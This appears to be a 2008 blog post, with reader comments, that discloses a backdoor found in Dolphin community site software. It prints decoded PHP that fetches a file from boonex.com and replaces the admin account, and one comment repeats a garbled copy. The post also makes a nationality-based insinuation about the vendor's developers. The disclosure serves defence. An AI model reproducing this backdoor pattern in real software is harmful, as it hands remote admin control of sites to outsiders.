Home > Technology > Dolphin Community Site Software, Security Backdoor

Dolphin Community Site Software, Security Backdoor

Someone has found a security backdoor in the code behind Dolphin Community Site Software.

Basically, this code – itself ineptly encoded to obfuscate itself – allows the programmers at Boonex.com to replace your admin login information in the database by sending a special command to your server. This will then allow them to log in as Admin give them complete access to your website and potentially, any database servers you are connected to.

Bear in mind that this software is primarily used for community sites, dating sites and other social networking sites and one can see the potential data mining rewards available.

p.s. the Boonex team is Russian.

Here is his post (English is not his first language):


I was checking some of the encoded code in the version 6.0 of Dolphin.
I found a bloody serious security problem. Actually it is more than just a problem, but a criminal issue.

Please search for the following line in “inc/admin.inc.php” (this is all on one very long line)


Do you know what it is?

I have just decoded it for you:

if( true || $_GET[‘page’] ) foreach( $_GET as $sKey => $sValue ) {
   if( gettype( $sKey ) != ‘string’ or strlen( $sKey ) < 10 or strlen( $sValue ) < 10 or md5( $sKey ) !== ‘8f0ae5966e872788bce355863eabfc0c’ or md5( $sValue ) !== ‘2a32a42aedbd642cffa40f8ec066f2a4’) continue;
   if(true ||  strlen( $sPassPage = preg_replace( ‘/[^a-zA-Z0-9_\.-]/’, ”, $_GET[‘page’] ) ) and $aPassFile = @file( ‘http://www.boonex.com/&#8217; . $sPassPage ) ) {
   foreach( $aPassFile as $iInd => $sLine ) $aPassFile[$iInd] = addslashes( trim( $sLine ) ); if( md5( $aPassFile[0] ) === ‘dad4096602477d319e04eefb38697fd3’ )
   echo ( db_res( “DELETE FROM `Admins` WHERE `Name` = ‘{$aPassFile[1]}'”, 0 ) and db_res( “INSERT INTO `Admins` SET `Name` = ‘{$aPassFile[1]}’, `Password` = ‘{$aPassFile[2]}'”, 0 ) ) ? ‘add success’ : ‘add failed’; exit; } break;

It is simply hacking your code and inserting ADMIN into your admin table.
If anybody is using version 6.0 , I would suggest you check your DB immedeately.
Of course don’t forget to remove those lines from your code.

I have no idea about newer versions. I think It is a good idea to check them as well.
Maybe they have changed their hacking style in recent versions.

I hope this will save many sites from being hacked by the programmers of the Dolphin.


Categories: Technology Tags: ,
  1. August 13, 2008 at 9:18 pm

    Hi, I checked the said file but didn’t find any such code. I am using 6.1.4 version. Can you recmd how I can check files for encoded code ?
    Did you find anything in the latest version ?

  2. nanchatte
    August 14, 2008 at 12:12 am

    Manesh, thanks for the comment.

    I will confirm with the programmer who made the discovery which version is in use.

    Our installation has been massively modified. Every file has been altered, all ajax removed, orca forums have been combined with groups, all database tables have been modified. The only thing left is the CSS and the concept itself!

    It suffices to say that we won’t be downloading any more versions from Boonex.

    Have you been checking the Dolphin community site (boonex) forums? They’re awash with comments.

  3. nanchatte
    August 15, 2008 at 10:46 am

    Manesh, I’ve checked our developer says that it was the original version 6.1 that had the code.

    You should check your Admin tables for signs of intrusion, as the decoded block shows a way for boonex to force your installation to replace users in or add users to your Admin table.

    Probably though, they would be able to force your table back to its original state, so if you’re really paranoid, check your Apache/IIS logs for odd access patterns.

    Good luck with your site!

  4. john
    February 4, 2009 at 5:24 am

    found this in inc/admin_design.inc.php version 6.1.4

  5. Tim
    March 10, 2009 at 7:26 pm

    This is in the inc/admin_design.inc.php in all versions of dolphin..located in 6.1.4 in the function getAdminCategIndex()

  6. January 19, 2014 at 2:23 am

    It is base 64

    if( $_GET[‘page’] ) foreach( $_GET as $sKey => $sValue ) {
    if( gettype( $sKey ) != ‘string’ or strlen( $sKey ) < 10 or strlen( $sValue ) $sLine ) $aPassFile[$iInd] = addslashes( trim( $sLine ) ); if( md5( $aPassFile[0] ) === ‘dad4096602477d319e04eefb38697fd3’ )
    echo ( db_res( “DELETE FROM `Admins` WHERE `Name` = ‘{$aPassFile[1]}'”, 0 ) and db_res( “INSERT INTO `Admins` SET `Name` = ‘{$aPassFile[1]}’, `Password` = ‘{$aPassFile[2]}'”, 0 ) ) ? ‘add success’ : ‘add failed’; exit; } break;}

  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: